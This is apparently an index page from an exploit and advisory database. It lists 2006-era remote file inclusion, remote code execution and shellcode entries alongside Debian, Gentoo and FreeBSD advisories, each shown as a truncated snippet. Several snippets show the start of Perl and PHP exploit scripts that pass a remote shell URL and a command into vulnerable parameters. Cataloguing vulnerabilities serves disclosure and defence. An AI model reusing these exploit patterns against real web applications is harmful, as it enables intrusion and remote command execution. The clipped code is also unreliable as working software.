PHP-Post <= 1.01 (template) Remote Code Execution Exploit

!/usr/bin/php -q -d shortopentag=on ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+...

solaris/sparc executes command after setreuid (92 bytes + cmd)

Exploit for solaris/sparc platform in category shellcode ============================================================== solaris/sparc executes command after setreuid 92 bytes + cmd ============================================================== / bunkersparcexec.c V1.0 - Sat Oct 21 17:45:27 CEST...

FreeBSD : ingo -- local arbitrary shell command execution (18a14baa-5ee5-11db-ae08-0008743bf21a)

The Horde team reports a vulnerability within Ingo, the filter management suite. The vulnerability is caused due to inadequete escaping, possibly allowing a local user to execute arbitrary shell commands via procmail. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and...

WSN Forum 1.3.4 - 'prestart.php' Remote Code Execution

!/usr/bin/php -q -d shortopentag=on ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+...

phpBurningPortal 1.0.1 - 'lang_path' Remote File Inclusion

!/usr/bin/perl use LWP::UserAgent; use LWP::Simple; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = "questdelete.php?langpath="; elsif $fileno eq 2 $file = "questedit.php?langpath="; elsif $fileno eq 3...

Debian DSA-1021-1 : netpbm-free - insecure program execution

Max Vozeler from the Debian Audit Project discovered that pstopnm, a converter from Postscript to the PBM, PGM and PNM formats, launches Ghostscript in an insecure manner, which might lead to the execution of arbitrary shell commands, when converting specially crafted Postscript files...

ae2-include.txt

ae2 standart.inc.php Remote File Inclusion Download Source : http://ae.utbm.fr/equipeinfo/siteae-utbm-latest.tar.gz Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; standart.inc.php bugs ; requireonce$topdir . "include/lib/wiki2xhtml.inc.php"; requireonce$topdi...

AlberT-EasySite <= 1.0.a5 Remote File Inclusion

AlberT-EasySite = 1.0.a5 Remote File Inclusion Download Source : http://www.superalbert.it/download/AlberT-EasySite/AES1.0a5.tar.gz Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; logout.php bugs ; requireonce $PSAPATH.'/include/config.php'; exmple and methode...

Redaction System 1.0 (lang_prefix) Remote File Include Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = " conn.php?langprefix="; elsif $fileno eq 2 $file = "index.php?lang="; elsif $fileno ...

blueshoes <= 4.6_public Remote File Inclusion

blueshoes = 4.6public Remote File Inclusion Download Source : http://download.blueshoes.org/blueshoes-4.6public.zip Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; GoogleSearch.php bugs ; requireonce$APP'path''lib' . 'nusoap.php'; exmple and methode exploit ;...

GLSA-200609-20 : DokuWiki: Shell command injection and Denial of Service

The remote host is affected by the vulnerability described in GLSA-200609-20 DokuWiki: Shell command injection and Denial of Service Input validation flaws have been discovered in the image handling of fetch.php if ImageMagick is used, which is not the default method. Impact : A remote attacker...

PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion

source: https://www.securityfocus.com/bid/19840/info PHP-Proxima is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to retrieve arbitrary local files from the vulnerable system in the context of the...

iziContents-php.txt

!/usr/bin/php -q -d shortopentag=on include/rssfunctions.php line 32-40: .... $GLOBALS"rootdp" = './'; requireonce $GLOBALS"rootdp"."include/config.php"; requireonce $GLOBALS"rootdp"."include/db.php"; requireonce $GLOBALS"rootdp"."include/session.php"; includeonce...

Phorum 5 - pm.php Arbitrary Local Inclusion

Phorum 5 - pm.php Arbitrary Local Inclusion !/usr/bin/php -q -d shortopentag=on 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; retu...

EJ3 TOPo 2.2 (descripcion) Remote Command Execution Exploit

No description provided by source. !/usr/bin/perl EJ3 TOPO 2.2 Remote Code Execution Exploit --------------------------------------------- Note : This Exploit Just run TOPO 2.2 IHST : www.Hackerz.Ir AST : www.aria-security.net Coded & Discovered By Hessam-x use LWP::UserAgent; use LWP::Simple; us...

MyBulletinBoard (MyBB) < 1.1.3 Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl Tue Jun 13 12:37:12 CEST 2006 [email protected] Exploit HOWTO - read this before flood my Inbox you bitch! - First you need to create the special user to do this use: ./mybibi.pl --host=http://www.example.com --dir=/mybb -1 this step needs a graph...

SpamAssassin spamd vpopmail user vulnerability

Added: 06/09/2006 CVE: CVE-2006-2447 BID: 18290 OSVDB: 26177 Background SpamAssassin identifies spam e-mail using a variety of local and network based tests. spamd is a component of SpamAssassin which allows it to run as a network daemon. Problem When the vpopmail -v and paranoid -P options are...

DotClear 1.2.4 - prepend.php Remote File Inclusion

DotClear 1.2.4 - prepend.php Remote File Inclusion !/usr/bin/php -q -d shortopentag=on ? echo "DotClear = 1.2.4 prepend.php/'blogdcpath' arbitrary remote inclusion\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "dork: "propulsé par DotClear"...

Update Protection against AWStats "migrate" Shell Command Injection

AWStats is an open source web analystic reporting tool, suitable for analyzing data from internet services. A vulnerability has been identified in AWStats due to improper validation of user input. The vulnerability may be exploited by attackers to execute arbitrary commands. July 5, 2006On July 5...

NucleusCMS.txt

!/usr/bin/php -q -d shortopentag=on ...